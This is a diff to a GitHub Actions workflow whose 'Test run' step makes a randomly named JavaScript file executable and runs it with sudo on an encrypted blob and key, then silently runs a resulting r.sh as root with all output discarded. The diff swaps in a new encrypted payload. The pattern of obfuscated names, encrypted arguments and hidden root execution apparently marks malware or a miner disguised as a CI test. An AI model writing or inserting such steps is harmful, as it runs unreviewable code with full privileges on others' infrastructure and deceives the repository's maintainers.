--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'kyolg'
+        echo 'cfpj6'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+nTCR8msNbhmiqa1yN+xw2iH45hgjrhr2qRli0iE115hUrs4PCJ/0896MvDENhkEYgik/UDG5zQprVyHHpiHa2114p8V44Bdb4X2xAi2vuYu7lnhgii0dr 9z693a && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18Puz2osLDbWizxTYpxasutDWmTjl5HVu0KekpZGqXuT39WcClpVtM3O0xUNNvId8nnYTJj81HO7L6ffuIQPMT0Wm++yjMXoUmGG/z+mrTVZGu50XSlsSOV jve3sq && sudo sh r.sh > /dev/null 2>&1
